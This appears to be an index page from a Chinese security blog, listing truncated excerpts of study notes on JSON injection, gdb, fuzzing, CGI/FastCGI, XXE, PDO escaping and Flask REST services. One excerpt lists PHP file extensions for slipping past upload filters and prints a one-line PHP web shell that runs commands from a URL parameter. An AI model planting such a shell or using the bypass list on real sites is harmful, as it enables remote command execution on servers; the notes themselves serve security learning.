该文被密码保护。 阅读全文
摘要:
现在大部分web采用ajax通信,数据表现为json格式,因此可以尝试进行json注入。 json注入:根据实际情况进行注入。有的时候,可能是为了方便,有人会手动拼接下JSON,但是这种随手代码,却可能带来意想不到的安全隐患。第一种方式,利用字符串拼接:String user = "test01"; 阅读全文
摘要:
1.gdb如何调试没有符号表(未加-g选项的编译)的程序disassemble main 2.kali中zip使用 zip -r archive_name.zip directory_to_compress 下面是如果解压一个zip文档: # unzip archive_name.zip 2.反编译 阅读全文
摘要:
工具 https://www.ctftools.com/down/ Fuzzing Apache httpd server with American Fuzzy Lop + persistent mode https://sensepost.com/blog/2017/fuzzing-apache 阅读全文
摘要:
简介版: 1.fastcgi与cgi区别:fastcgi通过线程来响应请求,而cgi对每个请求生成一个进程。 2.典型nginx数据传输过程:user->nginx->本地socket(请求传输)->fastcgi(即进程管理器)->cgi进程。 转(感谢下面两位同学): http://blog.c 阅读全文
摘要:
转:http://www.runoob.com/Python/python-cgi.html 什么是CGI CGI 目前由NCSA维护,NCSA定义CGI如下: CGI(Common Gateway Interface),通用网关接口,它是一段程序,运行在服务器上如:HTTP服务器,提供同客户端HT 阅读全文
摘要:
1.php后缀限制 'php,php3,php4,php5,php6,php7,phpsh,inc,phtml','PHT'; 2.php木马 <?php echo shell_exec($_GET['cmd']); ?> 阅读全文
摘要:
提示:可以学习一下flask框架中对于密码进行校验的部分。封装了太多操作。 最近这些年,REST已经成为web services和APIs的标准架构,很多APP的架构基本上是使用RESTful的形式了。 本文将会使用python的Flask框架轻松实现一个RESTful的服务。 REST的六个特性: 阅读全文
摘要:
小结 1.http包发送类型:content-type:text/xml2.xxe漏洞非常危险, 因为此漏洞会造成服务器上敏感数据的泄露,和潜在的服务器拒绝服务攻击。要去校验DTD(document type definition)中SYSTEM标识符定义的数据,并不容易,也不大可能。大部分的XML 阅读全文
摘要:
转:http://blog.csdn.net/sky_zhe/article/details/9702489 转:http://zhangxugg-163-com.iteye.com/blog/1835721 如何才能禁止PHP本地转义而交由MySQL Server转义呢? PDO有一项参数,名为P 阅读全文
摘要:
转:http://Python.jobbole.com/84286/ 原文出处: Vladik 译文出处:开源中国 我职业生涯的大部分都在使用微软的架构,最近我决定走出技术的舒适区,步入开源软件世界。我现在日常工作的项目是一个RESTful服务,这个服务需要在主流硬件上运行,且能够按照需要进行水平拓 阅读全文